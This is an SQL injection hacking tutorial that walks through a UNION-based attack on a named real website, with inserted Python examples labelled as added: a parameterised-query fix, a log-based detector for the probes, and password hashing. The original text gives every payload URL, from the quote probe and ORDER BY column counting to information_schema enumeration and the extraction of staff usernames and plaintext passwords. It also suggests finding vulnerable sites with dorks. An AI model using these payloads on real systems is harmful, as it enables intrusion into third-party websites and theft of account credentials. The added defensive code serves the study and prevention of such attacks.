How To Hack Website By Sql Injection

Basic SQL injection walkthrough with bizjournal.com as an example (not vulnerable now).


You can find many vulnerable websites using dorks.


Code:
http://www.bizjournal.com/content/article.php?id=124




The first thing you'll do is open that URL in your browser and add a tick (a single quote, ') to the end of it.






Code:
http://www.bizjournal.com/content/article.php?id=124'




Success! You will get the valuable SQL error that you're looking for.




Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1
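The error above is what an unparameterised query produces once the quote becomes part of the SQL text. The following Python example is added here and is not part of the original post: it reproduces the failure mode against an in-memory SQLite table (a constructed stand-in; the real site's schema and PHP code are not on the page) and shows the fix, binding the id as a parameter and validating that it is an integer, so the same inputs are treated as data and never as SQL.

```python
import sqlite3

# Constructed in-memory stand-in for the site's article table (not the real schema).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
    INSERT INTO articles VALUES (124, 'Sample article', 'constructed body text');
""")


def fetch_article_vulnerable(article_id: str):
    """String-built query: the pattern behind the error shown in the post.
    The user-supplied id is pasted straight into the SQL, so a quote in it
    changes the statement's structure instead of being treated as data."""
    sql = ("SELECT title, body FROM articles WHERE id=%s "
           "ORDER BY id ASC LIMIT 0, 1" % article_id)
    return _conn.execute(sql).fetchone()


def fetch_article_safe(article_id: str):
    """Parameterised query: the id travels as a bound value, never as SQL text.
    Anything that is not an integer is rejected before the database is touched."""
    try:
        id_int = int(article_id)
    except ValueError:
        return None  # not a valid article id; nothing to look up
    sql = "SELECT title, body FROM articles WHERE id=? ORDER BY id ASC LIMIT 0, 1"
    return _conn.execute(sql, (id_int,)).fetchone()


def probe_result(fn, article_id: str) -> str:
    """Classify what an id does to an implementation: 'row', 'none' or 'sql_error'.
    'sql_error' is the SQLite equivalent of the MySQL message quoted above."""
    try:
        return "row" if fn(article_id) is not None else "none"
    except sqlite3.OperationalError:
        return "sql_error"


if __name__ == "__main__":
    for value in ("124", "124'", "abc"):
        print(f"{value!r:8} vulnerable={probe_result(fetch_article_vulnerable, value):10} "
              f"safe={probe_result(fetch_article_safe, value)}")
```

Run as a script, the vulnerable function reports `sql_error` for the tick and for a non-numeric value, while the parameterised one simply finds no article; that difference is the whole fix.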


Now it is time to discover how many columns the underlying query returns.
The easiest way to do this is the SQL "ORDER BY" clause.
There are many other ways to do this, but this is the way I use.
To do it, take the URL and add "order by 1--" to the end:




Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--


You'll notice that the site loads normally, because the query returns at least one column.
The next step is to make the id a negative integer so that the page's normal content is not returned
and it is easier to see what you're doing:


Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--


Notice the id is now negative: "-124".


Now it's time to find out exactly how many columns the query returns. You do this by increasing the ORDER BY number:




Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--


Success! It errors on "order by 11--" because the query does not return 11 columns.
So now that we know we have only 10 columns, we move on to a new statement, "UNION SELECT ALL".
This can be done a number of ways too, but this is the way I do it.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--




This UNION adds a row containing the numbers 1 through 10, and the numbers that appear on the page tell you which columns are actually displayed.
Notice that we have data shown in columns 2, 3 and 4.
The next step is to get the website's database version. We do this with a simple "@@version"
in place of one of the numbers where data is shown; I will use 4.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--


This will return the database version on the page, in the spot where the number 4 was displayed.
Our version is:
5.0.67-log
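Every step so far is a separate HTTP request, and each one is recorded in the web server's access log. The following Python snippet is an added example, not from the original post: it scans constructed access-log lines (documentation IP addresses and made-up timestamps) for the request shapes used above and flags the client that sends them, so a defender can spot the column-counting walk and the UNION probe while they are still in progress.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request shapes used in the walkthrough above, matched against each decoded
# query-string value rather than the raw URL so %20 / + encoding cannot hide them.
SIGNATURES = {
    "quote_after_number": re.compile(r"^\s*-?\d+\s*'"),
    "order_by_walk":      re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}

# Apache/nginx combined-style line: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)


def classify_request(line: str):
    """Return (client, status, {param: [signature names]}) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = {}
    # parse_qsl percent-decodes and turns '+' into a space for us.
    for param, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        names = [n for n, rx in SIGNATURES.items() if rx.search(value)]
        if names:
            hits[param] = names
    return m.group("client"), int(m.group("status")), hits


def summarise(lines, order_by_threshold: int = 3):
    """Aggregate per client. A client is flagged when it sends UNION SELECT, touches
    information_schema, or walks ORDER BY past the threshold (the column-counting
    loop shown in the post). Note the 200 status on every probe: the application
    rendered the SQL error inside a normal page, so status-code alerting alone
    would miss this."""
    per_client = {}
    for line in lines:
        parsed = classify_request(line)
        if parsed is None:
            continue
        client, status, hits = parsed
        rec = per_client.setdefault(client, {"requests": 0, "signatures": {}, "flagged": False})
        rec["requests"] += 1
        for names in hits.values():
            for n in names:
                rec["signatures"][n] = rec["signatures"].get(n, 0) + 1
        sig = rec["signatures"]
        rec["flagged"] = (
            sig.get("union_select", 0) > 0
            or sig.get("information_schema", 0) > 0
            or sig.get("order_by_walk", 0) >= order_by_threshold
        )
    return per_client


# Constructed sample: one client replaying the probe sequence from this post
# (documentation IP 203.0.113.7) and one ordinary reader (198.51.100.20).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:12:00:00 +0000] "GET /content/article.php?id=124 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2010:12:00:05 +0000] "GET /content/article.php?id=124%27 HTTP/1.1" 200 610',
    '203.0.113.7 - - [01/Jan/2010:12:00:20 +0000] "GET /content/article.php?id=-124%20order%20by%201-- HTTP/1.1" 200 410',
    '203.0.113.7 - - [01/Jan/2010:12:00:25 +0000] "GET /content/article.php?id=-124%20order%20by%202-- HTTP/1.1" 200 410',
    '203.0.113.7 - - [01/Jan/2010:12:00:31 +0000] "GET /content/article.php?id=-124%20order%20by%2011-- HTTP/1.1" 200 612',
    '203.0.113.7 - - [01/Jan/2010:12:01:02 +0000] "GET /content/article.php?id=-124%20union%20select%20all%201,2,3,4,5,6,7,8,9,10-- HTTP/1.1" 200 430',
    '198.51.100.20 - - [01/Jan/2010:12:00:07 +0000] "GET /content/article.php?id=125 HTTP/1.1" 200 5210',
]

if __name__ == "__main__":
    for client, rec in summarise(SAMPLE_LOG).items():
        print(client, "FLAGGED" if rec["flagged"] else "ok", rec["signatures"])
```

The signatures are deliberately narrow, so a single hit on `comment_terminator` or one ORDER BY is not enough to flag a client; the per-client aggregation is what turns the individual requests into the pattern worth alerting on.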


The next step is to get the table names. This is where a lot of tutorials fall short: the simple
from information_schema.tables--
does not return just the user-created tables; it shows a lot of garbage such as CHARACTER_SETS, COLLATIONS, etc.
What we will do instead is restrict it to the current database by adding:
from information_schema.tables WHERE table_schema=database()--


To make this work on the site we use the "group_concat" function to display all the table names in one field:
group_concat(table_name)


For columns:
group_concat(column_name)


Example:




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--




Ah, now we have the user-created table names:


Code:
archives,articles,articles2,digest,edition,events,
links,nomination,sections,staff,survey


Now look at the table names and decide which one is likely to hold sensitive data; to me,
"staff" looks like a good choice.
So remember that one for a minute.


Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--








Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title,author,abstract,body,section,
keywords,photo,caption,caption2,caption3,caption4,lead,id,date,title,author,abstract,body,
section,keywords,photo,caption,caption2,caption3,caption4,lead,id,date,title,city,body,
id,volume,number,date,id,title,body,month,day,year,date,time,time2,location,cost,contact,phone,
email,url,approved,id,url,title,category,description,id,date,nominator,nominatortitle,nominatorcompany,
nominatoraddress,nominatorcity,nominatorstate,nominatorzip,nominatorphone,nominatorfax,
nominatoremail,nomineecompany,nomineeaddress,nomineecity,nomineestate,nomineezip,
nomineephone,nomineefax,nomineeweb,reason,reasonother,sat1,sat2,sat3,sat4,sat5,ethics1,
ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,dev1,dev2,dev3,dev4,dev5,dev6,
dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,quality2,contact1name,contact1title,
contact1phone,contact1email,contact2name,contact2title,contact2phone,contact2email,contact3name,
contact3title,c


Now you need to sift through these column names and find the ones of interest. But what happens when you don't see a column like username or password?


Sometimes some of the columns will be cut off; notice the "contact3title,c" at the end of the list.
Now it's time to do a little guessing, and this time it's easier than most: username and password are both column names.


So to check the columns we will use "group_concat" again, but with our guessed column names, and instead of:
from information_schema.tables where table_schema=database()--
we will use:
from staff--
Remember I told you to remember that table name earlier.


To give you an idea of what wrong column names look like, here is the query with guessed names ("user" and "pass") that do not exist:
Note: 0x3a is the hex code for the colon ":", used as a separator between the two values.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--


But we will try username and password this time.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--




Bingo! We have a short list of usernames and their passwords, and the passwords aren't even hashed:


Note: I am not responsible for any misuse of this tutorial. This is just for educational purposes.
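The last observation, that the password column holds plaintext, is the part of this walkthrough a defender can fix independently of the injection itself. The following Python is an added example, not from the original post, and assumes only the standard library; it shows what that column should hold instead: a salted PBKDF2 record that carries its own parameters, verified with a constant-time comparison.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed setting: choose an iteration count to suit your hardware and revisit it over time.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record 'pbkdf2_sha256$iterations$salt_hex$hash_hex'.
    This is what a 'password' column should store instead of the plaintext value;
    a fresh random salt per user means identical passwords produce different records."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute from the salt and iteration count embedded in the record and compare
    in constant time. Malformed records are rejected rather than raising."""
    try:
        algo, iterations, salt_hex, hash_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
        return hmac.compare_digest(digest.hex(), hash_hex)
    except (ValueError, TypeError):
        return False


if __name__ == "__main__":
    record = hash_password("example-passphrase")  # constructed value
    print(record)
    print("correct:", verify_password("example-passphrase", record))
    print("wrong:  ", verify_password("not-it", record))
```

Storing the iteration count inside the record lets you raise it later and re-hash users transparently on their next successful login, without a flag day for the whole table.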
